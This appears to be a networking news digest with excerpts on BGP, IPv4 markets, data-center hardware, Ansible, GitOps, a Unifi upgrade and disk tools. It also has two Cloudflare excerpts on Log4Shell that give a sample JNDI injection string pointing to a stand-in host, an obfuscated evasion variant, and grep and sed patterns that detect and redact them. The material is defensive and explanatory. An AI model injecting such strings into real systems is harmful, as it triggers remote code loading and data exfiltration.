Highlights: Dynamic Negotiation of BGP Capabilities

The Dynamic Negotiation of BGP Capabilities blog post generated almost no comments, apart from the #facepalm realization that a certain network operating system resets IBGP sessions when the sole EBGP session goes down, but there were a few interesting comments on LinkedIn and Twitter.

While most engineers can easily relate to the awkwardness of bringing down a BGP session to enable new functionality (“Tearing down a BGP session as a solution reminds me of rebooting a host as a solution.”), it’s not as easy as it looks. As Adam Chappell put it: “Dynamic capability renegotiation does tend to sound a bit like changing the tyres while still moving. Very neat if you can pull it off, but so much to go wrong…”

IPv4 Address Markets

We have come down a long and tortuous path with respect to the treatment of Internet addresses. The debate continues over whether the formation of markets for IPv4 addresses was a positive step for the Internet, or a forced decision that was taken with extreme reluctance. Let’s scratch at this topic, look at the formation of this market in IP addresses and the dynamics behind it, and then consider the future prospects for this market.

Equinix adds more processors to its bare-metal service

Data-center giant Equinix has expanded its bare-metal services to offer CPU, GPU, and AI processors on its Equinix Metal service offering. The service now includes AMD’s Milan generation of Epyc processors, Ampere’s Arm-based Altra, and Intel’s Ice Lake generation of Xeon processors. In November, Nvidia and Equinix announced an expanded collaboration to bring Nvidia’s LaunchPad AI platform, which includes instant, short-term access to AI infrastructure, to nine Equinix International Business Exchange (IBX) data centers globally. Enterprise accounts can test AI apps on LaunchPad, then deploy and scale on Equinix Metal or Nvidia DGX Foundry, which are also running at Equinix. To read this article in full, please click here.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure, showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, as well as mass attempts to exfiltrate data, including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell), we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers, and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability, attackers used unobfuscated strings typically starting with ${jndi:dns, ${jndi:rmi, and ${jndi:ldap, and simple rules looking for those patterns were effective.
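
As a generic illustration (not taken from Cloudflare's WAF rules), a naive check of this kind boils down to a case-insensitive search for those literal prefixes; the log path below is just a placeholder:

  # Minimal sketch of the simplistic pattern matching early rules relied on:
  # flag any request line containing an unobfuscated JNDI lookup prefix.
  grep -Ei '\$\{jndi:(ldap|rmi|dns)' /var/log/nginx/access.log

It also shows why such rules were easy to evade: a nested lookup such as ${${lower:j}ndi:... no longer contains the literal ${jndi: prefix.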

Quickly after those strings were being blocked and attackers Continue reading

IBM, Samsung team on unconventional, super-efficient semiconductor

IBM and Samsung Electronics have designed what the tech giants call an unconventional semiconductor that promises to reduce energy consumption by 85% over existing chips. The design would enable a ton of new applications, including energy-efficient cryptomining and data encryption, as well as cell phone batteries that could hold a charge for over a week instead of days without being recharged, the companies stated. The new semiconductor could also find its way into new internet of things (IoT) and edge devices that draw less energy, letting them operate in more diverse environments like ocean buoys, autonomous vehicles, and spacecraft, the companies stated. To read this article in full, please click here.

Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium

eBPF has taken the Linux networking world by storm. But what is it, exactly? And how is it related to the open-source Cilium project? Duffie Cooley joins Scott Lowe on the Full Stack Journey podcast to discuss eBPF and Cilium. If you're into Linux, networking, or Kubernetes---or any combination of these---this episode is for you!

The post Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium appeared first on Packet Pushers.

New reference architecture: Deploying Red Hat Ansible Automation Platform 2.1

With the release of Red Hat Ansible Automation Platform 2.1, we are proud to deliver the latest reference architecture on best practices for deploying a highly available Ansible Automation Platform environment.

Why are you going to love it?

This reference architecture focuses on providing a step-by-step deployment procedure to install and configure a highly available Ansible Automation Platform environment from start to finish.

But there’s more!

Aside from the key steps to install Ansible Automation Platform, it incorporates key building blocks to optimize your Ansible Automation Platform environments, including:

  • Centralized logging across multiple Ansible Automation Platform environments.

  • Securing installation inventory passwords using ansible-vault (see the sketch after this list).

  • Using a combination of GitOps practices (configuration as code capabilities) and Git webhooks to streamline the automation and delivery of configurations to multiple Ansible Automation Platform sites automatically, immediately and consistently. 
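
For example, inventory passwords can be protected with ansible-vault roughly like this (a minimal sketch, not copied from the reference architecture; variable names and file names are placeholders, and the actual platform installer invocation is not shown):

  # Encrypt a single password value for use in the installation inventory
  ansible-vault encrypt_string 'SuperSecretAdminPassword' --name 'admin_password'

  # ...or encrypt an entire variables file referenced by the inventory
  ansible-vault encrypt group_vars/all/vault.yml

  # Supply the vault password when running playbooks against that inventory
  ansible-playbook -i inventory site.yml --ask-vault-pass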

What are the foundational pieces to this reference architecture?

The reference architecture consists of two Ansible Automation Platform environments, Ansible Site 1 and Ansible Site 2, for high availability. Site 1 is an active environment, while Site 2 is a passive environment. Each site consists of the following:

  • A three-node automation controller cluster with one PostgreSQL database.

  • Continue reading

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility. Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.
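
As a rough, generic illustration of what redacting such tokens means (this is not Cloudflare's actual Logpush implementation), it amounts to rewriting anything that looks like a ${jndi:...} lookup before the log line is stored or forwarded:

  # Naive sketch: replace ${jndi:...} lookups in a log file with a fixed marker.
  # Real redaction also has to handle nested and obfuscated variants.
  sed -E 's/\$\{jndi:[^}]*\}/REDACTED/g' app.log > app.sanitized.log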

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote Continue reading

Checking Network Device Configurations in a GitOps CI Pipeline

Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.
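
As a minimal illustration of such a pipeline check (nothing here is from the original post; the directory layout and the validate_config command are placeholders for whatever linter or vendor tool you use), a CI job could validate every device configuration changed in a merge request before it is allowed to merge:

  # Hypothetical CI step: validate every device config changed on this branch.
  set -e
  for cfg in $(git diff --name-only origin/main -- 'configs/*.cfg'); do
    echo "Checking $cfg"
    validate_config "$cfg"   # placeholder for a config linter or syntax check
  done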

When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:

Unifi docker upgrade

This post is mostly a note to self for when I need to upgrade next time.

Because of the recent bug in log4j, which also affected the Unifi controller, I decided to finally upgrade the controller software.

Some background: There are a few different ways to run the controller. You can use “the cloud”, run it yourself on some PC or Raspberry Pi, or you can buy their appliance.

I run it myself because I already have a Raspberry Pi 4 running, which is cheaper than the appliance, gives me control of my data, and works during an ISP outage.

I thought it’d be a good opportunity to play with docker, too.

How to upgrade

Turns out I’d saved the command I used to create the original docker container. Good thing too, because it seems that upgrading is basically: delete the old, install the new.

  1. Take a backup from the UI.
  2. Stop the old instance (docker stop <old-name-here>).
  3. Take a backup of the state directory.
  4. Make sure the old instance doesn’t restart (docker update --restart=no <old-name-here>).
  5. Create a new instance with the same state directory (see the command sketch after this list).
  6. Wait a long time (at least on Raspberry Pi), like Continue reading
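
The exact commands aren't in the excerpt above, but the general shape of steps 2-5 looks roughly like this (container names, image name, paths, and ports are placeholders, not taken from the post, and depend on the controller image you use):

  # Stop the old controller and keep it from restarting
  docker stop unifi-old
  docker update --restart=no unifi-old

  # Back up the state directory the old container was using
  cp -a /srv/unifi /srv/unifi.backup

  # Start a new container from the newer image, reusing the same state directory
  docker run -d --name unifi-new \
    --restart=unless-stopped \
    -v /srv/unifi:/unifi \
    -p 8443:8443 -p 8080:8080 \
    example/unifi-controller:latest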

Intel, hardware vendors working on a high-performance network card

Intel announced a collaboration with Inspur, Ruijie Networks, and Silicom Connectivity Solutions to design and develop new infrastructure processing units (IPUs) using both a CPU and an FPGA. The IPU—what Intel calls a data-processing unit (DPU)—is a programmable networking device designed to offload network-processing tasks such as storage virtualization, network virtualization, and security from the CPU. That reduces overhead and frees up the CPU to focus on its primary data-processing functions. IPUs are becoming a real growth industry, with multiple products on the market from Nvidia, Marvell, Fungible, and Xilinx. To read this article in full, please click here.

The latest tape storage is faster and holds more, but is it better?

Magnetic storage tape hasn’t been the recommended destination for the initial backup copy of data for quite some time, and the question is whether LTO-9, the latest open tape standard, and other market dynamics will change that. Here's a look at modern tape drives, a discussion of the degree to which ransomware changes the equation, and a closer look at LTO-9. Tape drives: Too fast for their own good? In the '80s and early '90s, there was an almost perfect match between the speed of tape drives and the speed of the backup infrastructure. The backup drives were capable of writing at roughly the same speed that the backup system could send data. To read this article in full, please click here.

Looking at Linux disk usage with the ncdu command

The ncdu command provides a useful and convenient way to view disk usage. The name stands for "NCurses disk usage", which means it's based on ncurses which, like curses, is a terminal-control library used on Unix/Linux systems. The curses part of each name is a pun on "cursor" or "cursor optimization" and is unrelated to the use of foul language. You can think of ncdu as a disk-usage analyzer with an ncurses interface. It can be especially useful when looking for disk-space hogs on a remote server for which you don't have access to a graphical interface. To use ncdu, you can just type "ncdu", but what you will see depends on where you are positioned in the file system, as ncdu reports the space used by files and directories in that location. To read this article in full, please click here.
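
A few typical invocations (the paths are just examples; -x keeps the scan on a single filesystem, while -o and -f export and re-import scan results):

  ncdu /var/log          # interactively browse usage under /var/log
  ncdu -x /              # scan from the root, but stay on one filesystem
  ncdu -o scan.out /srv  # export scan results to a file...
  ncdu -f scan.out       # ...and browse them later, possibly on another machine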